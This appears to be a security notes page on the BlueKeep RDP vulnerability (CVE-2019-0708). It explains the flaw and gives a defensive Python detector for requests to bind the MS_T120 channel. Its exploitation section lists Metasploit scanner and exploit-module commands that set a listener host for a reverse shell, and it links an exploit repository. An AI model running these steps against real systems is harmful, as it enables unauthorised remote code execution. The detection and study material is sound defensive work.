# CVE-2019-0708: BlueKeep

{% embed url="<https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-168a>" %}

{% embed url="<https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2019-0708>" %}

BlueKeep is a critical vulnerability in the Remote Desktop Protocol (RDP) implementation on Windows that lets an unauthenticated remote attacker execute arbitrary code, potentially gaining full control of the affected host and a foothold in its network. Microsoft disclosed it in May 2019; the flaw is a memory-corruption bug in the kernel-mode RDP driver. A patch was released on May 14, 2019, but many systems running Windows XP, Vista, 7, and Server 2008 R2 remained unpatched at the time. Over 1 million systems worldwide were at risk when the vulnerability was discovered.

{% embed url="<https://nvd.nist.gov/vuln/detail/cve-2019-0708>" %}

## Why the Vulnerability Occurs

The vulnerability affects Microsoft's Remote Desktop Services (formerly Terminal Services), which lets users remotely access a Windows system over the Remote Desktop Protocol (RDP), normally on port 3389/TCP. The flaw lies in the handling of the "MCS Connect Initial and GCC Create" request, part of the RDP connection sequence in which the client declares the static virtual channels it wants to use. A use-after-free in the RDP kernel driver (termdd.sys) can be triggered by a client that binds the internal `MS_T120` channel and sends crafted data to it, and no authentication is required to reach this code path. The result is arbitrary code execution with administrative privileges.
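The defensive counterpart of the paragraph above is to inspect the client's channel request: legitimate RDP clients never name `MS_T120`, so a Connect-Initial that asks for it is a strong indicator of a CVE-2019-0708 probe or exploit attempt, and network IDS signatures for BlueKeep look for exactly this. The following Python is an added example, not code from this page or from any of the linked projects. It parses the TS_UD_CS_NET client data block (per MS-RDPBCGR: a 4-byte TS_UD_HEADER, a 4-byte channelCount, then 12-byte channel definitions of an 8-byte NUL-padded name and 4-byte options) and flags a request for `MS_T120`. It assumes the caller has already stripped the T.125/GCC PER wrapping and passes in the concatenated client data blocks; the sample inputs are constructed, not captured traffic.

```python
import struct

# TS_UD_HEADER type values from MS-RDPBCGR (client data blocks inside the
# GCC Conference Create Request)
CS_CORE = 0xC001
CS_NET = 0xC003
# TS_UD_CS_NET channel definition: 8-byte name + 4-byte options, 12 bytes total
CHANNEL_DEF_SIZE = 12
CHANNEL_OPTION_INITIALIZED = 0x80000000


def iter_client_data_blocks(data: bytes):
    """Yield (type, payload) for each TS_UD_HEADER-prefixed block in `data`.

    `data` is the concatenated sequence of client data blocks, i.e. what is
    left once the T.125 Connect-Initial / GCC PER wrapping has been removed
    (that unwrapping is assumed to happen before this function is called).
    """
    off = 0
    while off + 4 <= len(data):
        btype, blen = struct.unpack_from("<HH", data, off)
        if blen < 4 or off + blen > len(data):
            raise ValueError(f"malformed block at offset {off}: length {blen}")
        yield btype, data[off + 4:off + blen]
        off += blen


def parse_cs_net_channels(payload: bytes):
    """Parse TS_UD_CS_NET: channelCount followed by channelDefArray."""
    (count,) = struct.unpack_from("<I", payload, 0)
    if 4 + count * CHANNEL_DEF_SIZE > len(payload):
        raise ValueError("channelCount exceeds block length")
    channels = []
    for i in range(count):
        base = 4 + i * CHANNEL_DEF_SIZE
        raw_name = payload[base:base + 8]
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", errors="replace")
        (options,) = struct.unpack_from("<I", payload, base + 8)
        channels.append((name, options))
    return channels


def requested_channels(data: bytes):
    """Return the static virtual channel names the client asked for."""
    for btype, payload in iter_client_data_blocks(data):
        if btype == CS_NET:
            return [name for name, _ in parse_cs_net_channels(payload)]
    return []


def requests_ms_t120(data: bytes) -> bool:
    """True if the client tries to bind the internal MS_T120 channel.

    The comparison is case-insensitive as a conservative detection choice.
    """
    return any(name.upper() == "MS_T120" for name in requested_channels(data))


# --- constructed sample input (not real captures) -------------------------

def build_block(btype: int, payload: bytes) -> bytes:
    return struct.pack("<HH", btype, 4 + len(payload)) + payload


def build_cs_net(names) -> bytes:
    payload = struct.pack("<I", len(names))
    for name in names:
        assert len(name) <= 7, "channel names are at most 7 chars plus NUL"
        payload += name.encode("ascii").ljust(8, b"\x00")
        payload += struct.pack("<I", CHANNEL_OPTION_INITIALIZED)
    return build_block(CS_NET, payload)


# A zero-filled CS_CORE stands in for the real 216-byte core block; the
# scanner only needs its header to skip over it.
PLACEHOLDER_CS_CORE = build_block(CS_CORE, b"\x00" * 216)

BENIGN_CLIENT = PLACEHOLDER_CS_CORE + build_cs_net(["rdpdr", "rdpsnd", "cliprdr"])
SUSPECT_CLIENT = PLACEHOLDER_CS_CORE + build_cs_net(["rdpdr", "MS_T120", "cliprdr"])

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_CLIENT), ("suspect", SUSPECT_CLIENT)):
        print(label, requested_channels(sample), "MS_T120:", requests_ms_t120(sample))
```

The block walker validates every length field before slicing, so a truncated or oversized block raises instead of silently misparsing; in a sensor this is worth logging on its own, since malformed Connect-Initial data is itself unusual.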

{% embed url="<https://www.zerodayinitiative.com/blog/2019/5/27/cve-2019-0708-a-comprehensive-analysis-of-a-remote-desktop-services-vulnerability>" %}

## Exploitation

### MSF

{% code overflow="wrap" %}

```bash
# enumeration with nmap (service and OS detection, skip host discovery)
sudo nmap -Pn -sV -O [IP]

# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run

# exploitation (only x64 targets are supported)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# The exploit may fail with a "bad config" error when the target build is
# not detected correctly; choose the matching target manually instead.
show targets
set target [target index]
run
```

{% endcode %}

### Others

{% embed url="<https://github.com/Ekultek/BlueKeep/tree/master>" %}
